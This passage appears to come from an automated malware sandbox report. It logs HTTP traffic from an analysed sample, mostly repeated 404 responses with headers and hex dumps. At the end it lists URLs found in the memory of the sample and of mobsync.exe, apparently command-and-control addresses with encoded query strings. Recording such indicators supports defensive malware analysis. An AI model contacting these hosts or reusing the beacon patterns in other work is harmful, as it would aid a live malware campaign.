20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:39:02 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 07 Oct 2024 08:39:09 GMT
            server: LiteSpeed
            platform: hostinger
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            x-xss-protection: 1; mode=block
            x-content-type-options: nosniff
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 07 Oct 2024 08:39:12 GMT
            server: LiteSpeed
            platform: hostinger
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            x-xss-protection: 1; mode=block
            x-content-type-options: nosniff
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 07 Oct 2024 08:39:15 GMT
            server: LiteSpeed
            platform: hostinger
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            x-xss-protection: 1; mode=block
            x-content-type-options: nosniff
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 07 Oct 2024 08:39:17 GMT
            server: LiteSpeed
            platform: hostinger
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            x-xss-protection: 1; mode=block
            x-content-type-options: nosniff
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 07 Oct 2024 08:39:21 GMT
            Connection: close
            Content-Length: 4953
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 07 Oct 2024 08:39:24 GMT
            Connection: close
            Content-Length: 4953
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 07 Oct 2024 08:39:27 GMT
            Connection: close
            Content-Length: 4953
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 07 Oct 2024 08:39:29 GMT
            Connection: close
            Content-Length: 5092
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx-reuseport/1.21.1
            Date: Mon, 07 Oct 2024 08:39:44 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx-reuseport/1.21.1
            Date: Mon, 07 Oct 2024 08:39:47 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx-reuseport/1.21.1
            Date: Mon, 07 Oct 2024 08:39:50 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx-reuseport/1.21.1
            Date: Mon, 07 Oct 2024 08:39:52 GMT
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 278
            Connection: close
            Vary: Accept-Encoding
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.federall.store Port 80</address></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 08:40:32 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 08:40:35 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 08:40:37 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 08:40:40 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 
78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 
78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 
78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 
77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000007D74000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000006094000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://animekuid.xyz/ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3758373668.00000000091AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3758373668.00000000091AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online/1yii/
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000772C000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000005A4C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/vv4m/?7NP=7FXXUPl&amp;EZ2lo=YHtjADYkxu7EjL2CugAOyFkd
